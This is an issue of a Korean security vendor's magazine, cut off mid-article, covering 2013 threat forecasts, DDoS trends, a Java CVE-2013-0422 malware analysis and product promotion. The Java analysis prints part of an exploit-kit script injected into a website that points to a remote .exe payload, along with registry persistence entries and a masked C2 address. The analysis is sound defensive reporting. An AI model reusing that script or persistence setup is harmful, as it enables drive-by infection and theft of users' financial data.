안랩 온라인 보안 매거진 -...
TRANSCRIPT
2013 Security Preview
2013. 2
안랩 온라인 보안 매거진
2
3
6
9
1 2
1 4
2 0
2 3
월간
C O N T E N T S
S P E C i a l R E P O R T
키워드를 통해 본 2013년 보안 위협 전망
올해 보안 화두는 ‘고도화된 타깃 공격 실시간 대응’
E x P E R T C O l u m N
DDoS 공격은 현재 진행 중? 현재 진화 중!
T h R E aT a N a ly S i S
Java, 제로데이 ‘공습’에 대비하라
P R O d u C T i S S u E
AhnLab Policy Center Appliance 라인업 강화
손쉬운 엔드포인트 중앙관리, 안정성은 기본•비용 절감은 덤!
T E C h R E P O R T
디지털 타임 포렌식_심화편
시간 정보의 집합체, 타임라인을 파헤치다
a h N l a b N E w S
‘인증된’ 파트너 “고품격 고객 지원은 우리 손에 달렸다”
안랩, 스마트폰 보안 특허 3종 획득
APT 대응, 차세대 원격관제 서비스가 답
S TaT i S T i C S
2012년 12월 보안 통계 및 이슈
2013. 2
3
올해 보안 키워드를 한마디로 압축하면 ‘고도화된 타깃 공격 실시간 대응’이 될 듯하다. 최근 공격자들은 광범위한 지역을 상대로 악
성코드를 유포하기 보단, 특정 지역을 대상으로 악성코드를 제작•유포하는 경향을 보이고 있다. 즉, 국지화•고도화하고 있는 셈이다.
하루가 다르게 발전하고 있는 공격들로 어제 안전했던 프로그램이 오늘은 위협 대상으로 떠오르는, 한치 앞을 내다보기 힘든 상황이
연출되고 있다. 보안업계가 진화를 거듭하며 즉각적인 대응을 펼쳐나가야 하는 이유다.
이에 안랩 시큐리티대응센터(ASEC)는 지난해 보안 위협 사례를 토대로 2013년 7대 보안 위협 전망을 내놓았다. 이를 통해 보안 이
슈를 사전 점검하고 대응 방안을 모색하는 기회를 갖고자 한다.
보안 위협 전망S P E C i a l R E P O R T
키워드를 통해 본 2013년 보안 위협 전망
올해 보안 화두는
‘고도화된 타깃 공격 실시간 대응’
APT 여전히 기승…업데이트 서버 해킹 등 공격 정밀화
2011년부터 보안 업계 화두로 떠오른 APT(Advanced Persistent Threat) 공격은 2013년에도
여전히 기승을 부릴 것으로 전망된다. 다만 그 형태는 더 진화할 것으로 보인다.
APT, 즉 고도화된 지능형 타깃 공격은 그동안 사람들의 심리를 파고드는 사회공학적 공격기법
을 주로 이용했다. 사람들의 호기심을 자극하는 소재로 작성된 각종 문서파일을, 이메일을 통
해 유포시켜 목적을 달성하는 공격 형태다. 이 과정에서 공격자들은 문서파일의 알려진 취약점
이나 알려지지 않은 취약점인 제로데이(Zero-Day) 취약점을 악용해 악성코드 등을 유포하곤
했다.
하지만 올해 APT 공격 기법은 더 고도화되는 경향을 보일 것이라는 게 전문가들의 대체적인 의견이다. 실제로 지난해 말 웹 및 일반 응용 프로
그램의 업데이트 서버를 해킹, 악성코드를 유포한 방식은 APT 공격 방식의 변화를 예고하기에 충분했다. 일반적으로 프로그램 업데이트는 프로
그램의 버전업과 안정화, 보안 취약점 제거를 위해 이뤄지는 것으로 알려져 있다. 때문에 업데이트 서버 공격은 세간의 인식을 뒤집은, 고도로
지능화된 공격기법으로 받아들여졌다.
이 같은 배경 탓에 올해 APT 공격은 전년과 마찬가지로 주요 위협으로 등장하겠지만, 방식 면에서 다변화되는 경향을 보일 것이라는 예측이 나
온다. 문서파일의 취약점을 악용하는 공격보다는 응용 프로그램의 업데이트 서버를 공격하는 사례 등이 증대될 가능성이 크다는 얘기다. 더구나
응용 프로그램은 그 종류와 버전이 다양해, 숨어있는 보안 홀을 정밀 타격할 수 있다는 측면에서 공격자들의 좋은 표적이 될 수 있다.
4
지역적 특성 이용한 모바일 악성코드 증가
스마트폰 사용자들이 기하급수적으로 늘어남에 따라, 모바일에 대한 보안 위협은 지난해에 이
어 올해에도 주요 위협 대상의 하나로 대두될 전망이다.
모바일 보안 위협은 그동안 유럽과 중국 등 해외를 중심으로 발생했다. 하지만 이제부터는 지
역적 특성을 타깃으로 한 위협이 증대될 것으로 보여 긴장이 고조되고 있다.
예를 들어 최근 국내 스마트폰 이용자들이 급격히 늘어나면서 모바일 뱅킹과 같은 금융거래가
크게 증가하는 추세다. 이 때문에 해외에서 주로 발견됐던 개인정보 탈취를 노린 모바일 악성
코드가 국내에서도 곧 발견될 것이라는 전망이 제기되고 있다.
지난해 국내에 처음 등장한 휴대전화 소액결제를 악용해 금전 탈취를 꾀한 모바일 악성코드 역시 올해 변형된 형태가 나타날 것으로 예상된다.
이와 별개로, 개인 모바일 기기를 업무 현장에서도 활용하는 BYOD(Bring Your Own Device)가 늘어나면서 기업 내부 정보가 외부로 유출되는
피해가 발생할 수 있다. 또한 스마트폰에 설치된 앱을 교묘히 조작해 스마트폰을 봇넷(Botnet)화 하는, 즉 공격자가 자유자재로 제어할 수 있는
기기나 네트워크로 변화시키는 위협들도 등장할 가능성이 점쳐진다.
특정 지역서 사용빈도 높은 취약점 악용 늘어날 것
각종 프로그램의 취약점을 악용한 공격은 2013년에도 지속될 예정이다.
마이크로소프트 오피스나 어도비 리더와 같이 세계적으로 사용 빈도가 높은 ‘문서 프로그램’들
에 대한 취약점 악용 공격이 여전할 것으로 예상된다. 이들 문서 프로그램은 앞서 설명한 APT
공격과 같이 주로 타깃 공격에 활용될 가능성이 높다.
이와 함께 올해는 특정 지역이나 언어권에서 주로 사용하는 프로그램이나 문서파일, 동영상 등
에 존재하는 취약점을 악용한 공격도 한층 증대될 것으로 보인다. 최근 공격자들이 목표를 세
밀하게 정조준한 뒤 그에 맞는 프로그램을 찾아 ‘맞춤형’ 공격을 감행하고 있기 때문이다.
세계적으로 사용량이 많은 ‘일반 프로그램’의 취약점을 악용한 공격도 두드러질 전망이다. 예를 들어 윈도우나 맥 운영체제에서 쓰이는 ‘자바
(Java)’ 프로그램에 존재하는 취약점을 악용한 악성코드 유포의 경우 다른 프로그램의 취약점 악용 공격보다 늘어날 것으로 전망된다.
클라우드 서비스 공격, 기업•개인에 다양한 피해 입힐 듯
2013년에는 클라우드 서비스에 대한 보안 위협도 증가할 것으로 예상된다.
클라우드 서비스는 영화나 사진, 문서 등의 파일을 별도의 서버에 저장해두고 필요할 때마다
다운로드해 사용하는 것으로써 시간과 공간의 제약에서 자유롭고 자원을 효율적으로 사용할
수 있다는 이점을 지니고 있다.
이 같은 이점으로 인해 기업들은 클라우드 서비스를 업무에 도입하는 방안을 적극 고려하고
있다. 일명 ‘스마트 오피스(Smart Office)’ 환경 구축이다. 기업뿐만 아니라, 개인들도 자유롭게
데이터를 주고받기 위해 개인용 스마트폰과 업무용 PC를 연계하는 데에 클라우드 서비스를 이
용하고 있어 클라우드 서비스 시장은 앞으로 크게 증가할 것으로 보인다.
이런 추세에 힘입어 클라우드 서비스에 대한 보안 위협이 올해 증대될 것이라는 게 전문가들의 예상이다. 예컨대 공격자들이 기업이 이용하는
클라우드 서비스 시스템 자체를 공격, 서비스 중단 등을 주장하며 금품을 요구하는 공격이 일어날 수 있다는 것이다.
일반 사용자들도 클라우드 서비스에 다양한 개인정보 관련 자료를 업데이트 하는 과정에서 개인정보 유출 등의 사생활 침해 문제가 발생할 수
있을 것으로 보인다.
5
핵티비즘 등 해킹, 실질적 피해 유발로 무게 중심 이동
2013년 해킹 공격은 기존보다 더 강력하고 피해가 큰 형태로 진화할 가능성이 높다.
최근까지 해킹은 자신의 의사 표현을 위한 공격 형태가 많은 편이었다. 해커가 자신의 정치적
의사 표시를 위해 특정 홈페이지를 공격해 변조시키거나, 디도스(DDoS, 분산서비스거부) 공격
을 통해 특정 사이트를 무력화하는 방식 등이 그것이다.
이와 더불어 중요 정보를 폭로하는 이른바 ‘폭로전’도 핵티비즘의 한 형태로 나타난 바 있다.
하지만 올해부터는 이에 그치지 않고 훨씬 강력한 공격이 감행될 것이라는 분석이 제기되고 있다.
국가 혹은 특정 기관이 보유한 시스템이나 데이터에 물리적이고 논리적인 파괴를 가함으로써, 실질적인 피해를 유발하는 해킹이 기승을 부릴
것이라는 전망이다.
이 과정에서 스카다(SCADA) 등 국가기간시설을 운용하는 시스템을 파괴하는 사이버전이 증가할 가능성도 배제할 수 없다. 국가 간 벌어지는
사이버전의 경우 상대 국의 사회에 커다란 혼란을 야기하는 파괴력을 지닌다는 점에서 심각성이 있다.
또 특정 지역의 관습을 반영하거나 스마트 기기를 연계하는 방식의 해킹도 전년에 이어 올해도 지속될 것으로 예측된다.
맥 악성코드 유포, 전년과 비슷…잠재적 위협도
맥 악성코드 유포는 지난 2012년과 비슷한 수준을 유지할 것으로 보인다. 이는 물론, 맥 운영
체제가 현재(2012년 말 기준)와 비슷한 시장 점유율을 기록할 경우에서의 예상이다.
이 같은 전망이 나오는 까닭은 공격자들의 입장에서 볼 때, 맥 운영체제를 공격하는 게 윈도우 운
영체제를 공격하는 것보다 비용 대비 효율이 떨어져서다.
세계적으로 윈도우 운영체제를 사용하는 PC 사용자가 더 많은 데다가 공격 방식도 다양하게 진
화해왔기 때문이다.
하지만 안심하긴 이르다. 2012년에 발견된 플래시백(Flashback) 악성코드와 같이 맥 운영체제에 존재하는 취약점을 악용한 악성코드가 발견되
면 언제든지 대규모 감염이 일어날 수 있다.
아울러 최근 들어 각 기업과 가정에서 윈도우 운영체제와 맥 운영체제를 동시에 설치, 사용하는 경우가 늘어나고 있어 이를 악용하는 크로스 플
랫폼 악성코드가 증가할 가능성도 있다.
다양한 플랫폼에 대한 보안 위협 증가
새로운 플랫폼이 등장하면 이에 맞는 새로운 보안 위협이 등장하게 마련이다.
2012년 말 출시된 윈도우8과 윈도우폰8로 인해 벌써부터 이에 맞는 공격 기법들이 소개되고
있다. 이들 플랫폼에 적용된 보안 기술을 우회하는 공격 기법들이 언더그라운드에서 회자되고
있는 것이다.
연구 목적의 화이트해커는 물론, 실제 공격을 준비하는 블랙해커들에게도 새로운 플랫폼의 등
장은 좋은 타깃이 아닐 수 없다.
이 때문인지 올해는 새 플랫폼을 겨냥한 새로운 공격이 나타날 것이라는 전망이 우세하다.
또 임베디드 소프트웨어가 탑재된 다양한 기기에 대한 보안 위협 연구도 증대될 것으로 보인다. 대중적으로 인기를 끌고 있는 플랫폼인 윈도우
나 맥, 안드로이드에 대한 보안 위협 연구가 증가할 것으로 보이는데, 그 이유는 이들이 가장 많은 양의 개인정보를 보유하고 있기 때문이다.
6
DDoS 공격 패러다임의 변화와 2013년 예측
2009년 7•7 DDoS 사흘 간 청와대, 백악관 등 23개 한국 및 미국 주요 사이트 공격
2011년 3•4 DDoS 이틀 간 관공서, 은행 등 40개 한국 내 주요 사이트 공격
전 세계적으로 유례가 없을 만큼 우리나라에서는 불과 3년 사이에 대규모 DDoS 공격이 두 차례나 발생했다. 반면 지난 2012년에는
APT라는 용어로 지칭되는 고도화된 지능형 타깃 공격이 보안의 화두였고, DDoS 공격에 관한 소식은 잠잠했다. 그러나 보이는 것이
전부가 아니듯, 비록 언론을 통해 떠들썩하게 보도되지는 않았지만 2012년에도 다수의 DDoS 공격이 발생했다. 오히려 과거에 비해
지능적인 DDoS 공격 유형이 발견됐으며, DDoS 공격 툴의 대중화로 공격 발생 빈도 또한 증가하고 있는 추세다.
2013년에는 더욱 지능화된 DDoS 공격이 나타날 수 있다고 전문가들은 경고하고 있다. 소리 없이 현재 진행 중이고, 앞으로 더욱 교
묘해질 DDoS 공격의 실체와 대응 방안을 살펴본다.
ddoS 공격 동향E x P E R T C O l u m N
DDoS 공격은 현재 진행 중? 현재 진화 중!
DDoS(Distributed Denial of Service, 분산서비스거부) 공격은 우리
나라에서는 대다수의 국민들이 한 번쯤은 들어봤을 만큼 이제는 매우
잘 알려진 사이버 위협이다. 두 차례의 대규모 DDoS 공격 사건 덕분
(?)이기도 하지만 대다수의 사람들이 알 수 있을 만큼 DDoS 공격이
자주 발생하고 있기 때문이라고 할 수 있다.
최근에는 전문 해커가 아니라도 쉽게 사용할 수 있게 제작된 DDoS
공격 툴을 인터넷을 통해 손쉽게 구할 수 있게 되면서 중학생이 온
동네 PC방을 다운시키는 사건이 발생하는 등 일반인에 의한 DDoS
공격 사례도 종종 나타나고 있다. 또한 돈만 지불하면 DDoS 공격을
대신해주는 청부형 DDoS 공격도 증가하고 있는 추세다. 이처럼 지속
적으로 발생하고 있는 크고 작은 DDoS 공격으로 인해 서버나 네트
워크가 몇 시간씩 다운되는 것을 경험하면서 기업이나 일반 시민들도
DDoS 공격의 심각성을 충분히 인지하고 있다.
한편 초기의 DDoS 공격은 주로 네트워크 장비를 타깃으로 대량의
네트워크 패킷을 전송해 네트워크 장비를 마비시키는 형태였다. 그러
나 최근에는 고성능의 발전된 네트워크 장비에 비해 상대적으로 가용
성이 낮은 웹 서버(웹 데몬)나 저성능 서버를 겨냥하여 소량의 트래픽
을 전송하는 형태의 DDoS 공격이 증가하고 있다. [그림 1] DDoS 공격 툴의 대중화 사례(출처 : 노컷뉴스)
7
[그림 2] 청부형 DDoS 공격 사례(출처 : ZDNet, 전자신문)
2012년 DDoS 공격, 작지만 강해졌다
2012년에도 다수의 DDoS 공격이 국내외에서 지속적으로 발생했다
([표 1], [표 2]). 공격자는 DDoS 공격 툴을 자신의 PC에 설치해 공격
을 하는 경우도 있기는 하지만, 통상적으로 공격자는 다수의 좀비 PC
를 확보한 후 이를 통해 DDoS 공격을 감행한다. 전 세계적으로 엄청
난 수의 좀비 PC가 확산되어 있으며, 그 중에서도 중국에 가장 많은
좀비 PC가 존재하는 것으로 알려져 있다. 인터넷 네트워크 업체 아카
마이(Akamai)가 지난해 발표한 ‘인터넷 현황 보고서’에 따르면 2011
년 4분기에 이어 2012년 1분기에도 중국에서 발생한 공격 트래픽의
비중이 세계에서 가장 높았다([표 3]).
2012년 국내•외 DDoS 공격의 동향을 요약한다면, ‘작은 패킷으
로 서버를 노리는 지능화된 공격의 증가’라고 할 수 있다. 지능화된
DDoS 공격이란, 기존 DDoS 방어 장비들이 임계치(Threshold) 기반
으로 공격 패킷이나 공격지 IP를 차단한다는 점에 착안해 임계치 이
하의 소량 패킷을 전송해 정상 패킷처럼 위장, 방어 장비의 탐지를 피
하는 형태라 할 수 있다.
최근에는 대량 패킷 사이에 소량의 웹 서버나 DB 서버 공격용 DDoS
패킷을 숨긴 교묘한 공격도 나타나고 있다. 대표적인 사례가 지난
2012년 10월에 발생한 영국 HSBC 은행에 대한 DDoS 공격이다. 당
발생 시기 주요 피해 내용
2012년 3월 초등학생 포함 10대 7명이 여성가족부 홈페이지를 ddoS 공격
2012년 6월 한 중학생이 580여 대 좀비 PC를 이용해 ddoS 공격 감행,
PC방 20여 곳 마비
2012년 7월
소셜커머스업체 티켓몬스터에 ddoS 공격 발생,
30여 분 간 접속 불가
모 대기업 그룹 사이트에 ddoS로 추정되는 공격 발생,
3시간 동안 서버 다운
2012년 12월 대선 즈음에 ddoS 공격 기능이 포함된 악성 파일이
대량 유포
발생 시기 주요 피해 내용
2012년 8월 영국 정부 사이트에 ddoS 공격 발생
2012년 9월 미국 온라인게임 개발사 라이엇게임즈에 ddoS 공격 발생
2012년 10월 영국 hSbC 은행에 ddoS 공격 발생, 10시간 동안 서버 다운
순위 국가 2012년 1분기 트래픽 2011년 4분기 트래픽
1 중국 16.0% 13.0%
2 미국 11.0% 10.0%
3 러시아 7.0% 6.8%
4 터키 5.7% 5.6%
5 대만 5.3% 7.5%
6 대한민국 4.3% 5.2%
7 브라질 4.0% 4.4%
8 루마니아 3.0% 2.6%
9 인도 3.0% 3.0%
10 독일 1.9% 1.8%
[표 1] 2012년 주요 국내 DDoS 공격 사례
[표 2] 2012년 주요 국외 DDoS 공격 사례
[표 3] 공격 발생지별 트래픽 Top 10 통계(출처 : Akamai)
8
2013년 DDoS 공격, 멀티벡터 방식 등을 이용해 더욱 진화할 것
한국인터넷진흥원(KISA)은 지난 1월 발표한 ‘2013년 인터넷 및 정보보
호 10대 이슈’를 통해 “공격 패턴 다양화부터 방어체계 우회까지, DDoS
공격이 진화할 것”으로 전망했다. 최근 몇년 간의 DDoS 공격 동향을
미루어 볼 때 2013년에도 DDoS 공격은 지속적으로 진화할 것이다.
특히 지난 2012년의 영국 HSBC 은행 공격 사례와 같이 소량의 패킷
으로 정상적인 패킷처럼 위장하면서 웹 서버나 DB 서버를 공격하는
시도가 계속 늘어날 것으로 보인다. 이처럼 교묘한 DDoS 공격은 수
백 혹은 수천 만 대의 좀비 PC를 이용한 기존의 공격과 달리 몇 대의
PC나 서버만 이용해도 공격이 가능하기 때문에 더욱 심각한 위협이다.
또한 클라우드 서비스가 증가함에 따라 클라우드 서버를 통한 공격도
증가할 것으로 전망돼 DDoS 공격 방어에 어려움이 예상된다. 주요
공격 발생지인 중국 IP 전체를 차단하더라도 한국 내에 있는 VPN, 또
는 아마존(Amazon) 등 미국이나 그 밖의 국가에 위치한 클라우드 서
버를 이용하여 공격할 수 있다. 따라서 전통적인 방식인 IP 기반으로
DDoS 공격을 차단하는 것에는 한계가 있다. 이 같은 공격을 방어하
기 위해서는 패킷을 전송한 IP(source IP)가 공격 툴을 통해 패킷을 생
성한 것인지, 실제로 정상적인 패킷이 전송된 것인지를 확인하고 인증
하는 방법이 필요하다.
한편 전 세계적으로 급격히 늘어난 스마트폰을 악용한 공격도 많이
출현할 것으로 예측된다. 아울러 인터넷을 통해 유통되고 있는 DDoS
공격 툴이 지속적으로 지능화되고 있을 뿐만 아니라 더욱 사용하기
쉽도록 사용자 환경, 화면, 기능 등이 나날이 개선되고 있어 DDoS 공
격의 대중화가 가속화될 전망이다. 따라서 이제 기업의 규모와 상관
없이 DDoS 공격 방어는 선택이 아니라 필수 검토 사항이 되어야 할
것이다.
DDoS 공격 패러다임의 변화, 더욱 정교한 방어 장비가 답
네트워크가 아니라 애플리케이션을 타깃으로 하는 지능화된 DDoS
공격에 대응하기 위해서는 정상적인 것처럼 위장한 패킷까지 철저하
게 분석하여 방어할 수 있는 기술이 필요하다. 동시에 DDoS 공격 방
어 장비가 정상적인 패킷을 잘못 차단하여 되레 서비스 장애를 유발
하는 일이 발생해서는 안 된다. 즉, 오탐을 최소화할 수 있는 정교한
분석 기술만이 나날이 지능화되는 DDoS 공격을 효과적으로 방어할
수 있다.
안랩 트러스가드 DPX(AhnLab TrusGuard DPX)는 탁월한 ‘패킷 전송
자 인증 기술’을 통해 정상과 공격 패킷을 구분하는 한편, 정상 패킷
의 오탐으로 인한 서비스 장애를 방지한다. 이로써 웹 서버를 공격하
는 웹 패킷 등 지속적으로 증가하는 애플리케이션에 대한 DDoS 공격
을 효과적으로 방어할 수 있다. 특히 트러스가드 DPX 10000은 최근
변화하는 네트워크 환경의 대용량 트래픽을 무리없이 처리하는 동시
에 전통적인 대량의 패킷을 이용하는 공격이나 멀티벡터를 이용한 최
신 공격까지 방어할 수 있는 최고 수준의 성능을 제공한다. 안랩 트러
스가드 DPX는 변화하는 네트워크 환경과 나날이 진화하는 DDoS 공
격 방어를 위한 최고의 선택이 될 것으로 보인다.
[그림 3] DDoS 공격 방식의 변화
시 대량 패킷에 의한 공격과 웹 서버 및 DB 서버를 타킷으로 하는 소
량의 애플리케이션 공격 패킷이 혼합된 멀티벡터 형태의 DDoS 공격
으로 무려 10시간 동안이나 이 은행의 서비스가 마비됐다.
9
Java의 제로데이(Zero-day) 취약점을 악용한 공격의 전파 속도가 점
차 빨라지는 추세다. 해외에서 발견된 지 수시간 만에 국내에 상륙, 급
속히 위협의 대상으로 떠오른 것이다.
실제 Java 제로데이 취약점 ‘CVE-2013-0422’는 해외에서 발견된 지
얼마 지나지 않은 지난 2013년 1월 10일 국내에 등장했다.
CVE-2013-0422 취약점의 경우 세계적으로 블랙홀 익스플로이트 킷
(Blackhole Exploit Kit), 쿨 익스플로이트 킷(Cool Exploit Kit), 뉴클
리어 익스플로이트 킷(Nuclear Exploit Kit) 등 자동화된 도구를 활용
해 다양한 형태로 빠르게 전 세계에 확산되고 있었다.
이 가운데 국내에서는 e-mail을 통해 악성 링크의 클릭을 유도하거나
SEO poisoning 기법을 이용해 검색 사이트 상위에 노출해 접근을 유
도하는 사례가 발견돼 긴장을 고조시켰다.
[그림 1]에서 보듯 악성코드 제작자는 e-mail을 받는 사람에게 출처를
알 수 없는 주소를 전달하고 클릭을 유도했다. 해당 주소는 클릭하면
악성코드가 다운로드되는 악성 URL이다. 해당 악성코드의 자세한 스
크립트 내용을 살펴보면 아래 [그림 2]와 같다.
이 익스플로이트에 포함된 악성 스크립트에 노출이 되면 PC 시스템
감염이 시작된다. 악성 파일이 감염되는 구조는 [그림 3]을 보면 자세
한 파악이 가능하다.
[그림 1] Java 취약점을 이용한 악성 e-mail
국내 웹하드 사이트, 게임핵 악성코드 유포 등에 다수 악용돼
최근 Java 소프트웨어에 대한 미국 내부의 강경한 입장이 전해지고 있다. Java의 보안 취약점이 잇따라 나타나면서 미국 정부가 나
서서 프로그램의 사용 중단을 권고한 데 이어, 주요 美 PC 업체들도 웹 브라우저에서 Java 사용을 차단하는 등 강경한 태도에 가세
한 것이다. 이런 중 우리나라에서도 Java의 취약점 경고음이 곳곳에서 울리고 있어 주의가 요구되고 있다.
Java 취약점T h R E a T a N a l y S i S
Java, 제로데이 ‘공습’에 대비하라
[그림 2] Java 취약점을 이용한 스크립트 코드
[그림 3] 다운되는 악성 Jar 파일 구조
10
Java의 CVE-2013-0422 취약점을 악용해 악성코드를 유포하는 사례
는 이 외에도 다수 발견됐다.
국내에서 서비스하고 있는 웹하드 업체의 홈페이지를 통해 유포하는
방식이 나왔다. 특히 이 경우는 사용자의 PC 시스템에 취약점이 존재
하면 홈페이지에 접속을 하는 것만으로도 감염이 돼 위험이 컸다.
아래 [그림 4]는 악성 스크립트가 삽입돼 해당 악성코드를 유포하는
데 악용된 웹하드 사이트다.
[그림 4] 악의적인 스크립트가 삽입된 홈페이지
[그림 5] 삽입된 스크립트 중 일부
[그림 5]는 웹하드 사이트에 삽입된 악의적인 스크립트의 내용 중 일부다.
웹하드 사이트에서 악성코드가 유포되는 방식은 공다 익스플로이트
킷(Gongda Exploit Kit)으로 나타난 점이 특징적이다. 공다 익스플로
이트 킷의 동작 방식은 아래와 같다.
공다 익스플로이트 킷은 웹 익스플로잇 툴킷의 스크립트 악성코드로,
Adobe 플래시와 Java 등 일반 애플리케이션의 취약점을 악용해 정
보를 탈취하는 방식으로 주로 활용돼 왔다. <월간 안>은 지난해 발행
된 5월호에서 공다 익스플로이트 킷의 여러 사례에 대해 자세히 다룬
바 있다.
또한 CVE-2013-0422는 게임핵 악성코드 유포와 Banki류의 악성코
드 유포에 일부 활용되기도 했다. 이 같은 방식의 악성코드 유포는 실
행파일인 아래 파일 유포지를 기준으로 확인했다.
gondad.archive="uPlEgy4.jpg";
gondad.code="xml20130422.XML20130422.class";
gondad.setAttribute("xiaomaolv","http://W1.xxx.net/cctv.exe");
gondad.setAttribute("bn","woyouyizhixiaomaolv");
gondad.setAttribute("si","conglaiyebuqi");
gondad.setAttribute("bs","748");
document.body.appendChild(gondad);
이 악성코드가 취약점을 통해 실행이 되면 아래와 같은 파일이 생성
된다.
또 아래와 같이 시스템 재시작 시에도 실행될 수 있도록 레지스트리
에 값을 등록한다.
Sever.exe 파일의 경우 실제 생성되는 것이 확인되지는 않았으며 cct.
exe 파일은 실행이 되면서 아래의 서버에 접속을 시도했다.
이와 더불어 함께 생성•실행되는 host.exe 파일에 의해 감염 시스템
의 hosts 파일이 변조된다.
해당 파일 내부에는 DialParamsUID, PhoneNumber, Device 등의
정보를 탈취할 것으로 보이는 일부 문자열 정보가 확인됐다. 문자열
정보는 아래 [그림 6]과 같다.
W1.******.net/cctv.exe
C:\WINDOWS\temp\cct.exe
C:\WINDOWS\temp\host.exe
HKLM\SOFT WARE\Microsoft\Windows\CurrentVersion\
Run\360寮땡렝徒
"C:WINDOWS\SHELLNEW\sever.exe"
HKLM\SOFT WARE\Microsoft\Windows\CurrentVersion\
Run\(Default)
"C:\WINDOWS\temp\cct.exe"
121.***.***.204:14465
Application Data\Microsoft\Network\Connections\pbk\
rasphone.pbk
Microsoft\Network\Connections\pbk\rasphone.pbk
[그림 6] 문자열 정보
[그림 7] 변조된 hosts 파일
11
이 분석 자료를 작성하며 재확인할 당시에는 관련 사이트로 연결이
이뤄지지 않았다. 그러나 hosts 파일이 변조된 것에서 유추해 볼 때,
일부 금융권 사이트에 접속할 시 사용자의 금융 정보를 탈취할 목적
의 악의적인 피싱 페이지로의 연결을 시도한 것으로 보인다.
이처럼 갖가지 방법으로 공격에 활용된 Java취약점 CVE-2013-0422
는 이미 Java에서 보안 업데이트를 제공하고 있다. 보안 업데이트만으
로 악성코드 감염을 예방할 수 있으므로, 반드시 보안 업데이트를 적
용해 안전하게 PC를 사용하도록 하자.
[보안 업데이트]
Http://www.java.com/ko/
[그림 8] Java 홈페이지 내 보안 업데이트 창
12
AhnLab Policy Center Appliance 라인업 강화
고도화되는 공격 양상과 함께 다양한 경로를 통해 악성코드가 기업 내부로 유입됨에 따라 기업 내 개별 PC의 보안 제품의 설치뿐만
아니라 이에 대한 중앙관리가 화두로 떠오르고 있다. 일부에서는 대용량 데이터 처리 등 안정적인 엔드포인트 중앙관리 솔루션 운용
부터가 난제인 상황이다. 또한 지속적인 경기 침체에 따른 비용 부담과 함께 지적재산권, 개인정보보호법 등 컴플라이언스 이슈가 등
장하면서 엔드포인트단의 보안이 새삼 기업 보안의 구멍(hole)으로 지목되고 있다.
안랩 폴리시센터 어플라이언스(AhnLab Policy Center Appliance, 이하 APC 어플라이언스)는 운영체제와 데이터베이스, 소프트웨
어를 전용 어플라이언스에 최적화한 제품으로, 매우 안정적인 엔드포인트 중앙관리가 가능하다는 평가를 받고 있다. 안랩은 상반기
에 APC 어플라이언스에 레이드(RAID)를 기본으로 탑재한 라인업을 추가해 더욱 안정성을 높일 예정이라고 밝혀 주목을 끌고 있다.
비용 문제와 각종 컴플라이언스 이슈 등 기업의 총체적인 엔드포인트 관리 리스크의 해법이 될 새로워진 APC 어플라이언스를 미리
만나보자.
aPC applianceP R O d u C T i S S u E
손쉬운 엔드포인트 중앙관리,
안정성은 기본•비용 절감은 덤!
APC 어플라이언스는 기업 PC용 보안 솔루션 V3 Internet Security 제품군과 서버용 보안 솔루션 V3 Net 제품군을 통합 관리할 수 있는 어플라
이언스 형태의 엔드포인트 중앙관리 솔루션이자 플랫폼이다. 이를 통해 기업 보안 관리자는 기업 보안 정책에 따른 보안 제품 관리는 물론, 바이
러스 확산 방지를 위한 사전 방역 기능을 이용해 취약한 PC의 네트워크 접근을 제어함으로써 안전한 네트워크 환경을 유지할 수 있다. 또한 자
산관리, 원격지원 등 데스크톱 매니지먼트 기능을 통해 기업 내 전체 PC에 대한 제어 및 기업 내 발생 가능한 보안 위협에 효과적으로 대처할
수 있다. 단, 이것은 APC 어플라이언스를 극히 소극적으로 활용할 때의 얘기다.
개인정보 관리까지 한 번에
APC 어플라이언스를 통해 백신은 물론 패치, 개인정보까지 중앙에서 쉽고 간편하게 관리할 수 있다. 안랩의 패치 관리 솔루션 안랩 패치 매니지
먼트(AhnLab Patch Management)나 통합 개인정보보호 솔루션 안랩 프라이버시 매니지먼트(AhnLab Privacy Management)는 라이선스만
추가하면 별도의 구축 작업 등은 전혀 필요하지 않다. 간편한 라이선스 추가 만으로 최근 기업 보안 관리자와 경영진의 골칫거리가 되고 있는
개인정보보호법, 정통망법 등 컴플라이언스에 대한 부담을 덜 수 있다.
▲ APC 어플라이언스의 새로운 라인업
APC 어플라이언스의 장점은 리눅스 기반 제품이라 총소유비용이 낮고,
어플라이언스 제품이기 때문에 소프트웨어 제품에 비해 안정성과 사용
편의성이 높다는 것이다.
대부분의 보안관리 제품은 도입 시 하드웨어와 운영체제, 데이터베이스
등 관련 소프트웨어를 별도로 구입해야 한다. 그러나 APC 어플라이언
스는 리눅스 기반의 어플라이언스 제품으로써 초기 도입 및 운용 비용
을 절감할 수 있다. APC 어플라이언스는 제품 1대 당 2000 유저(User)
부터 최대 1만 유저까지 지원하기 때문에 하드웨어 및 소프트웨어 라
이선스 비용 추가를 최소화할 수 있어 기업의 총소유비용(Total Cost
Ownership, TCO) 절감의 효과를 가져온다.
특히 최근 불법소프트웨어 복제 및 사용과 관련한 지적재산권 침해 단
13
속이 강화되면서 라이선스 비용 문제가 기업의 리스크로 작용하고 있다. APC 어플라이언스는 라이선스 비용이 거의 발생하지 않는 리눅스(Linux)
OS 및 데이터베이스를 지원해 라이선스 관련 비용 이슈를 극소화한다. 또한 볼륨 라이선스 계약 고객뿐만 아니라 볼륨 라이선스 계약이 없는 일반
고객의 경우도 추가적인 비용 절감이 가능하다.
레이드 기본 탑재 라인업으로 안정성 강화
기업에 있어 중요한 것은 비용만이 아니다. 안정적인 데이터 처리를 통한 업무 연속성의 보장이야 말로 비즈니스의 관건이다.
안랩은 올해 상반기에 새롭게 출시 예정인 APC 어플라이언스의 다양한 라인업을 통해 고객사의 입맛에 따라 비용 절감과 안정성을 모
두 잡는다는 전략이다. APC 어플라이언스는 TCP 기반의 통신구조로 데이터 신뢰성을 극대화했다. [표 1]과 같이 APC 어플라이언스
2000PR/5000PR/10000PR은 레이드(RAID) 기반의 안정적인 하드웨어로 서버 1대 당 최대 1만 명의 사용자에 대한 대용량 처리가 가능하다.
또한 APC 어플라이언스 2000P/5000P는 상대적으로 사용량이 많지 않은 기업에 적합한 라인업으로, 레이드 없이도 안정적으로 운영할 수 있
도록 백업 디스크가 추가된다.
이상국 안랩 마케팅실장은 “엔드포인트 중앙관리솔루션인 APC 어플라이언스의 가장 큰 장점은 백신부터 패치, 개인정보 관리까지 통합적으로 운
영이 가능하다는 점이다”라며 “작년에 이어 올해도 개인정보보호법과 빅데이터가 화두가 되고 있는 만큼, 레이드 탑재와 대용량 처리가 가능한 새
